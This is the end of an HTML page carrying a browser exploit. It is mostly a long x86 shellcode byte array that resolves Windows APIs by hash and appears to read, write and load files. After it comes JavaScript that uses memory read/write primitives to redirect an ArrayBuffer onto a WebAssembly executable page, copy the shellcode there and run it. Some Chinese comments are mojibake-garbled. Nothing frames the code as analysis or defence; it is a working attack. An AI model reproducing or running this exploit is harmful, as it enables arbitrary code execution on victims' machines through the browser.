0x33, 0xC0, 0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x51, 0x8B, 0x45, 0x08, 0x89, 0x45, 0xFC, 0x83, 0x7D, 0x0C, 0x00, 0x74, 0x1C,
0x8B, 0x4D, 0xFC, 0x8A, 0x55, 0x10, 0x88, 0x11, 0x8B, 0x45, 0xFC, 0x83, 0xC0, 0x01, 0x89, 0x45,
0xFC, 0x8B, 0x4D, 0x0C, 0x83, 0xE9, 0x01, 0x89, 0x4D, 0x0C, 0xEB, 0xDE, 0x8B, 0x45, 0x08, 0x8B,
0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0x83, 0x7D, 0x08, 0x00, 0x74, 0x06, 0x83, 0x7D, 0x0C, 0x00,
0x75, 0x04, 0x33, 0xC0, 0xEB, 0x3C, 0x8B, 0x45, 0x08, 0x89, 0x45, 0xF8, 0x8B, 0x4D, 0x10, 0x89,
0x4D, 0xFC, 0x8B, 0x55, 0x10, 0x83, 0xEA, 0x01, 0x89, 0x55, 0x10, 0x83, 0x7D, 0xFC, 0x00, 0x74,
0x1E, 0x8B, 0x45, 0x08, 0x8B, 0x4D, 0x0C, 0x8A, 0x11, 0x88, 0x10, 0x8B, 0x45, 0x08, 0x83, 0xC0,
0x01, 0x89, 0x45, 0x08, 0x8B, 0x4D, 0x0C, 0x83, 0xC1, 0x01, 0x89, 0x4D, 0x0C, 0xEB, 0xCD, 0x8B,
0x45, 0xF8, 0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x51, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x09, 0x8B, 0x45, 0xFC,
0x83, 0xC0, 0x01, 0x89, 0x45, 0xFC, 0x8B, 0x4D, 0xFC, 0x3B, 0x4D, 0x0C, 0x7D, 0x2A, 0x8B, 0x55,
0x08, 0x03, 0x55, 0xFC, 0x0F, 0xBE, 0x02, 0x33, 0x45, 0x10, 0x8B, 0x4D, 0x08, 0x03, 0x4D, 0xFC,
0x88, 0x01, 0x8B, 0x55, 0x08, 0x03, 0x55, 0xFC, 0x0F, 0xBE, 0x02, 0x03, 0x45, 0x14, 0x8B, 0x4D,
0x08, 0x03, 0x4D, 0xFC, 0x88, 0x01, 0xEB, 0xC5, 0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x81, 0xEC, 0xE8, 0x00, 0x00, 0x00, 0xC7, 0x45, 0x98, 0x2E, 0x00, 0x44, 0x00,
0xC7, 0x45, 0x9C, 0x4C, 0x00, 0x4C, 0x00, 0xC7, 0x45, 0xA0, 0x00, 0x00, 0x00, 0x00, 0x64, 0xA1,
0x30, 0x00, 0x00, 0x00, 0x89, 0x45, 0xC4, 0x8B, 0x4D, 0xC4, 0x8B, 0x51, 0x0C, 0x89, 0x55, 0xC0,
0x8B, 0x45, 0xC0, 0x8B, 0x48, 0x0C, 0x89, 0x4D, 0xBC, 0x8B, 0x55, 0xBC, 0x89, 0x55, 0xD8, 0x8B,
0x45, 0xD8, 0x83, 0x78, 0x18, 0x00, 0x0F, 0x84, 0x16, 0x03, 0x00, 0x00, 0xC7, 0x45, 0xF8, 0x00,
0x00, 0x00, 0x00, 0x8B, 0x4D, 0xD8, 0x8B, 0x51, 0x18, 0x89, 0x55, 0xE4, 0x8B, 0x45, 0xD8, 0x8B,
0x48, 0x2C, 0x8B, 0x50, 0x30, 0x89, 0x4D, 0xA4, 0x89, 0x55, 0xA8, 0x8B, 0x45, 0xE4, 0x8B, 0x4D,
0xE4, 0x03, 0x48, 0x3C, 0x89, 0x4D, 0xCC, 0xBA, 0x08, 0x00, 0x00, 0x00, 0x6B, 0xC2, 0x00, 0x8B,
0x4D, 0xCC, 0x8B, 0x54, 0x01, 0x78, 0x89, 0x55, 0xC8, 0xB8, 0x08, 0x00, 0x00, 0x00, 0x6B, 0xC8,
0x00, 0x8B, 0x55, 0xCC, 0x8B, 0x44, 0x0A, 0x7C, 0x89, 0x45, 0xB0, 0x8B, 0x4D, 0xD8, 0x8B, 0x11,
0x89, 0x55, 0xD8, 0x83, 0x7D, 0xC8, 0x00, 0x75, 0x02, 0xEB, 0x94, 0xC7, 0x45, 0xEC, 0x00, 0x00,
0x00, 0x00, 0xEB, 0x09, 0x8B, 0x45, 0xEC, 0x83, 0xC0, 0x01, 0x89, 0x45, 0xEC, 0x0F, 0xB7, 0x4D,
0xA6, 0x39, 0x4D, 0xEC, 0x73, 0x45, 0x8B, 0x55, 0xA8, 0x03, 0x55, 0xEC, 0x89, 0x55, 0xFC, 0x8B,
0x45, 0xF8, 0xC1, 0xE8, 0x0D, 0x8B, 0x4D, 0xF8, 0xC1, 0xE1, 0x13, 0x0B, 0xC1, 0x89, 0x45, 0xF8,
0x8B, 0x55, 0xFC, 0x0F, 0xBE, 0x02, 0x83, 0xF8, 0x61, 0x7C, 0x12, 0x8B, 0x4D, 0xFC, 0x0F, 0xBE,
0x11, 0x8B, 0x45, 0xF8, 0x8D, 0x4C, 0x10, 0xE0, 0x89, 0x4D, 0xF8, 0xEB, 0x0C, 0x8B, 0x55, 0xFC,
0x0F, 0xBE, 0x02, 0x03, 0x45, 0xF8, 0x89, 0x45, 0xF8, 0xEB, 0xA9, 0x8B, 0x4D, 0xE4, 0x03, 0x4D,
0xC8, 0x89, 0x4D, 0xE0, 0x8B, 0x55, 0xE0, 0x8B, 0x42, 0x18, 0x89, 0x45, 0xB8, 0x8B, 0x4D, 0xE0,
0x8B, 0x55, 0xE4, 0x03, 0x51, 0x20, 0x89, 0x55, 0xD0, 0xC7, 0x45, 0xEC, 0x00, 0x00, 0x00, 0x00,
0xEB, 0x09, 0x8B, 0x45, 0xEC, 0x83, 0xC0, 0x01, 0x89, 0x45, 0xEC, 0x8B, 0x4D, 0xEC, 0x3B, 0x4D,
0xB8, 0x0F, 0x83, 0x16, 0x02, 0x00, 0x00, 0xC7, 0x45, 0xF4, 0x00, 0x00, 0x00, 0x00, 0x8B, 0x55,
0xD0, 0x8B, 0x02, 0x03, 0x45, 0xE4, 0x89, 0x45, 0xB4, 0x8B, 0x4D, 0xD0, 0x83, 0xC1, 0x04, 0x89,
0x4D, 0xD0, 0x8B, 0x55, 0xB4, 0x89, 0x55, 0xFC, 0x8B, 0x45, 0xF4, 0xC1, 0xE8, 0x0D, 0x8B, 0x4D,
0xF4, 0xC1, 0xE1, 0x13, 0x0B, 0xC1, 0x89, 0x45, 0xF4, 0x8B, 0x55, 0xFC, 0x0F, 0xBE, 0x02, 0x03,
0x45, 0xF4, 0x89, 0x45, 0xF4, 0x8B, 0x4D, 0xFC, 0x83, 0xC1, 0x01, 0x89, 0x4D, 0xFC, 0x8B, 0x55,
0xFC, 0x0F, 0xBE, 0x42, 0xFF, 0x85, 0xC0, 0x75, 0xCF, 0x8B, 0x4D, 0xF4, 0x03, 0x4D, 0xF8, 0x89,
0x4D, 0xF4, 0x8B, 0x55, 0xF4, 0x3B, 0x55, 0x08, 0x0F, 0x85, 0xAA, 0x01, 0x00, 0x00, 0x8B, 0x45,
0xE0, 0x8B, 0x4D, 0xE4, 0x03, 0x48, 0x24, 0x8B, 0x55, 0xEC, 0x66, 0x8B, 0x04, 0x51, 0x66, 0x89,
0x45, 0xD4, 0x8B, 0x4D, 0xE0, 0x8B, 0x55, 0xE4, 0x03, 0x51, 0x1C, 0x0F, 0xB7, 0x45, 0xD4, 0x8B,
0x4D, 0xE4, 0x03, 0x0C, 0x82, 0x89, 0x4D, 0xDC, 0x8B, 0x55, 0xDC, 0x3B, 0x55, 0xE0, 0x72, 0x0B,
0x8B, 0x45, 0xE0, 0x03, 0x45, 0xB0, 0x39, 0x45, 0xDC, 0x76, 0x0D, 0x8B, 0x45, 0xDC, 0xE9, 0x71,
0x01, 0x00, 0x00, 0xE9, 0x60, 0x01, 0x00, 0x00, 0xC7, 0x45, 0xF0, 0x00, 0x00, 0x00, 0x00, 0x8B,
0x4D, 0xDC, 0x03, 0x4D, 0xF0, 0x0F, 0xBE, 0x11, 0x83, 0xFA, 0x2E, 0x74, 0x20, 0x8B, 0x45, 0xDC,
0x03, 0x45, 0xF0, 0x66, 0x0F, 0xBE, 0x08, 0x8B, 0x55, 0xF0, 0x66, 0x89, 0x8C, 0x55, 0x18, 0xFF,
0xFF, 0xFF, 0x8B, 0x45, 0xF0, 0x83, 0xC0, 0x01, 0x89, 0x45, 0xF0, 0xEB, 0xD2, 0xC7, 0x45, 0xF4,
0x00, 0x00, 0x00, 0x00, 0x8B, 0x4D, 0xF0, 0x8B, 0x55, 0xDC, 0x8D, 0x44, 0x0A, 0x01, 0x89, 0x45,
0xFC, 0x8B, 0x4D, 0xF4, 0xC1, 0xE9, 0x0D, 0x8B, 0x55, 0xF4, 0xC1, 0xE2, 0x13, 0x0B, 0xCA, 0x89,
0x4D, 0xF4, 0x8B, 0x45, 0xFC, 0x0F, 0xBE, 0x08, 0x03, 0x4D, 0xF4, 0x89, 0x4D, 0xF4, 0x8B, 0x55,
0xFC, 0x83, 0xC2, 0x01, 0x89, 0x55, 0xFC, 0x8B, 0x45, 0xFC, 0x0F, 0xBE, 0x48, 0xFF, 0x85, 0xC9,
0x75, 0xCF, 0xC7, 0x45, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x8B, 0x55, 0xE8, 0x0F, 0xB7, 0x44, 0x55,
0x98, 0x85, 0xC0, 0x74, 0x27, 0x8B, 0x4D, 0xF0, 0x8B, 0x55, 0xE8, 0x66, 0x8B, 0x44, 0x55, 0x98,
0x66, 0x89, 0x84, 0x4D, 0x18, 0xFF, 0xFF, 0xFF, 0x8B, 0x4D, 0xF0, 0x83, 0xC1, 0x01, 0x89, 0x4D,
0xF0, 0x8B, 0x55, 0xE8, 0x83, 0xC2, 0x01, 0x89, 0x55, 0xE8, 0xEB, 0xCD, 0x33, 0xC0, 0x8B, 0x4D,
0xF0, 0x66, 0x89, 0x84, 0x4D, 0x18, 0xFF, 0xFF, 0xFF, 0xC7, 0x45, 0xF8, 0x00, 0x00, 0x00, 0x00,
0xC7, 0x45, 0xE8, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x09, 0x8B, 0x55, 0xE8, 0x83, 0xC2, 0x01, 0x89,
0x55, 0xE8, 0x8B, 0x45, 0xF0, 0x8D, 0x4C, 0x00, 0x02, 0x39, 0x4D, 0xE8, 0x73, 0x49, 0x8B, 0x55,
0xE8, 0x8D, 0x84, 0x15, 0x18, 0xFF, 0xFF, 0xFF, 0x89, 0x45, 0xFC, 0x8B, 0x4D, 0xF8, 0xC1, 0xE9,
0x0D, 0x8B, 0x55, 0xF8, 0xC1, 0xE2, 0x13, 0x0B, 0xCA, 0x89, 0x4D, 0xF8, 0x8B, 0x45, 0xFC, 0x0F,
0xBE, 0x08, 0x83, 0xF9, 0x61, 0x7C, 0x12, 0x8B, 0x55, 0xFC, 0x0F, 0xBE, 0x02, 0x8B, 0x4D, 0xF8,
0x8D, 0x54, 0x01, 0xE0, 0x89, 0x55, 0xF8, 0xEB, 0x0C, 0x8B, 0x45, 0xFC, 0x0F, 0xBE, 0x08, 0x03,
0x4D, 0xF8, 0x89, 0x4D, 0xF8, 0xEB, 0xA2, 0x8B, 0x55, 0xF8, 0x03, 0x55, 0xF4, 0x89, 0x55, 0x08,
0x68, 0x4C, 0x77, 0xD6, 0x07, 0xE8, 0xC6, 0xFC, 0xFF, 0xFF, 0x83, 0xC4, 0x04, 0x89, 0x45, 0xAC,
0x8D, 0x85, 0x18, 0xFF, 0xFF, 0xFF, 0x50, 0xFF, 0x55, 0xAC, 0x8B, 0x4D, 0x08, 0x51, 0xE8, 0xAD,
0xFC, 0xFF, 0xFF, 0x83, 0xC4, 0x04, 0xEB, 0x0C, 0xE9, 0xD5, 0xFD, 0xFF, 0xFF, 0xE9, 0xDD, 0xFC,
0xFF, 0xFF, 0x33, 0xC0, 0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x18, 0x68, 0x2D, 0x57, 0xAE, 0x5B, 0xE8, 0x80, 0xFC, 0xFF, 0xFF,
0x83, 0xC4, 0x04, 0x89, 0x45, 0xF0, 0x68, 0xDA, 0xF6, 0xDA, 0x4F, 0xE8, 0x70, 0xFC, 0xFF, 0xFF,
0x83, 0xC4, 0x04, 0x89, 0x45, 0xF4, 0x68, 0xC6, 0x96, 0x87, 0x52, 0xE8, 0x60, 0xFC, 0xFF, 0xFF,
0x83, 0xC4, 0x04, 0x89, 0x45, 0xEC, 0x83, 0x7D, 0x08, 0x00, 0x74, 0x0C, 0x83, 0x7D, 0x0C, 0x00,
0x74, 0x06, 0x83, 0x7D, 0x10, 0x00, 0x75, 0x04, 0x33, 0xC0, 0xEB, 0x73, 0x6A, 0x00, 0x68, 0x80,
0x00, 0x00, 0x00, 0x6A, 0x02, 0x6A, 0x00, 0x6A, 0x00, 0x68, 0x00, 0x00, 0x00, 0xC0, 0x8B, 0x45,
0x08, 0x50, 0xFF, 0x55, 0xF4, 0x89, 0x45, 0xFC, 0x83, 0x7D, 0xFC, 0xFF, 0x75, 0x04, 0x33, 0xC0,
0xEB, 0x4D, 0xC7, 0x45, 0xF8, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x45, 0xE8, 0x00, 0x00, 0x00, 0x00,
0x6A, 0x00, 0x8D, 0x4D, 0xF8, 0x51, 0x8B, 0x55, 0x10, 0x52, 0x8B, 0x45, 0x0C, 0x50, 0x8B, 0x4D,
0xFC, 0x51, 0xFF, 0x55, 0xF0, 0x8B, 0x55, 0x10, 0x2B, 0x55, 0xF8, 0x89, 0x55, 0x10, 0x8B, 0x45,
0x0C, 0x03, 0x45, 0xF8, 0x89, 0x45, 0x0C, 0x83, 0x7D, 0x10, 0x00, 0x77, 0xD3, 0x83, 0x7D, 0xFC,
0x00, 0x74, 0x07, 0x8B, 0x4D, 0xFC, 0x51, 0xFF, 0x55, 0xEC, 0xB8, 0x01, 0x00, 0x00, 0x00, 0x8B,
0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x08, 0x8B, 0x45, 0x08, 0x89, 0x45, 0xFC, 0x8B, 0x4D, 0xFC, 0x0F,
0xBE, 0x11, 0x89, 0x55, 0xF8, 0x8B, 0x45, 0xFC, 0x83, 0xC0, 0x01, 0x89, 0x45, 0xFC, 0x83, 0x7D,
0xF8, 0x00, 0x74, 0x02, 0xEB, 0xE6, 0x8B, 0x45, 0xFC, 0x2B, 0x45, 0x08, 0x83, 0xE8, 0x01, 0x8B,
0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
0x55, 0x8B, 0xEC, 0x81, 0xEC, 0x40, 0x04, 0x00, 0x00, 0xC7, 0x45, 0xEC, 0x00, 0x00, 0x00, 0x00,
0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00, 0x00, 0x68, 0x88, 0xD1, 0xA6, 0xEA, 0xE8, 0x5F, 0xFB, 0xFF,
0xFF, 0x83, 0xC4, 0x04, 0x89, 0x45, 0xE8, 0x68, 0x48, 0xE4, 0x16, 0xEA, 0xE8, 0x4F, 0xFB, 0xFF,
0xFF, 0x83, 0xC4, 0x04, 0x89, 0x45, 0xE4, 0x68, 0x50, 0x7D, 0xA3, 0x7E, 0xE8, 0x3F, 0xFB, 0xFF,
0xFF, 0x83, 0xC4, 0x04, 0x89, 0x45, 0xDC, 0x68, 0x9F, 0x1A, 0xFF, 0x08, 0xE8, 0x2F, 0xFB, 0xFF,
0xFF, 0x83, 0xC4, 0x04, 0x89, 0x45, 0xC4, 0x68, 0x0F, 0x43, 0xE8, 0x29, 0xE8, 0x1F, 0xFB, 0xFF,
0xFF, 0x83, 0xC4, 0x04, 0x89, 0x45, 0xE0, 0x6A, 0x00, 0x6A, 0x11, 0x8D, 0x45, 0xC8, 0x50, 0xE8,
0x1C, 0xFA, 0xFF, 0xFF, 0x83, 0xC4, 0x0C, 0x6A, 0x00, 0x6A, 0x11, 0x8D, 0x4D, 0xC8, 0x51, 0x8B,
0x55, 0x08, 0x52, 0xFF, 0x55, 0xE8, 0x89, 0x45, 0xFC, 0x83, 0x7D, 0xFC, 0x00, 0x7D, 0x07, 0x33,
0xC0, 0xE9, 0xEF, 0x00, 0x00, 0x00, 0x6A, 0x00, 0x8D, 0x45, 0xC8, 0x50, 0xE8, 0x1F, 0xFF, 0xFF,
0xFF, 0x83, 0xC4, 0x04, 0x50, 0x8D, 0x4D, 0xC8, 0x51, 0x8B, 0x55, 0x08, 0x52, 0xFF, 0x55, 0xE4,
0x89, 0x45, 0xEC, 0x83, 0x7D, 0xEC, 0x00, 0x7D, 0x07, 0x33, 0xC0, 0xE9, 0xC5, 0x00, 0x00, 0x00,
0x8D, 0x45, 0xC8, 0x50, 0xFF, 0x55, 0xE0, 0x89, 0x45, 0xF8, 0x8B, 0x4D, 0xF8, 0x51, 0xFF, 0x55,
0xDC, 0x89, 0x45, 0xF4, 0x6A, 0x00, 0x8B, 0x55, 0xF8, 0x52, 0x8B, 0x45, 0xF4, 0x50, 0xE8, 0xAD,
0xF9, 0xFF, 0xFF, 0x83, 0xC4, 0x0C, 0x8B, 0x4D, 0xF8, 0x89, 0x4D, 0xC0, 0x6A, 0x00, 0x68, 0x00,
0x04, 0x00, 0x00, 0x8D, 0x95, 0xC0, 0xFB, 0xFF, 0xFF, 0x52, 0xE8, 0x91, 0xF9, 0xFF, 0xFF, 0x83,
0xC4, 0x0C, 0xC7, 0x45, 0xFC, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x00, 0x68, 0x00, 0x04, 0x00, 0x00,
0x8D, 0x85, 0xC0, 0xFB, 0xFF, 0xFF, 0x50, 0x8B, 0x4D, 0x08, 0x51, 0xFF, 0x55, 0xE8, 0x89, 0x45,
0xF0, 0x83, 0x7D, 0xF0, 0x00, 0x7E, 0x2F, 0x8B, 0x55, 0xF0, 0x52, 0x8D, 0x85, 0xC0, 0xFB, 0xFF,
0xFF, 0x50, 0x8B, 0x4D, 0xF4, 0x03, 0x4D, 0xFC, 0x51, 0xE8, 0x92, 0xF9, 0xFF, 0xFF, 0x83, 0xC4,
0x0C, 0x8B, 0x55, 0xFC, 0x03, 0x55, 0xF0, 0x89, 0x55, 0xFC, 0x8B, 0x45, 0xFC, 0x3B, 0x45, 0xF8,
0x75, 0x02, 0xEB, 0x02, 0xEB, 0xB3, 0x83, 0x7D, 0xF4, 0x00, 0x74, 0x14, 0x6A, 0x11, 0x6A, 0x1A,
0x8B, 0x4D, 0xF8, 0x51, 0x8B, 0x55, 0xF4, 0x52, 0xE8, 0xC3, 0xF9, 0xFF, 0xFF, 0x83, 0xC4, 0x10,
0x8B, 0x45, 0x0C, 0x8B, 0x4D, 0xF4, 0x89, 0x08, 0x8B, 0x55, 0x10, 0x8B, 0x45, 0xF8, 0x89, 0x02,
0xB8, 0x01, 0x00, 0x00, 0x00, 0x8B, 0xE5, 0x5D, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC
]
var data_buf = new ArrayBuffer(shellcode.length * 8);
var data_view = new DataView(data_buf);
var data_buf_address = addrof(data_buf) - 1;
//print("[*]data_buf_address:0x" + data_buf_address.toString(16));
//注æ„å移é‡
var buf_backing_store_addr = data_buf_address + 0x10;
// alert("buf_backing_store_addr:0x" + buf_backing_store_addr.toString(16));
//注æ„å移é‡
let rwx_page = lower(read64(wasm_instance_addr + 0x40));
//print("[*] rwx_page addr 0x" + (rwx_page).toString(16));
write64(buf_backing_store_addr, rwx_page);
//print("write to: 0x" + buf_backing_store_addr.toString(16) + " data:0x" + rwx_page.toString(16));
var tmp2 = read64(buf_backing_store_addr);
//print("tmp2:0x" + tmp2.toString(16));
for (let i = 0; i < shellcode.length; i++) {
data_view.setUint8(i, shellcode[i], true);
}
//alert("[*] 写代ç æˆåŠŸ" + rwx_page.toString(16));
f();
// alert("[*]执行完毕")
</script>
</html>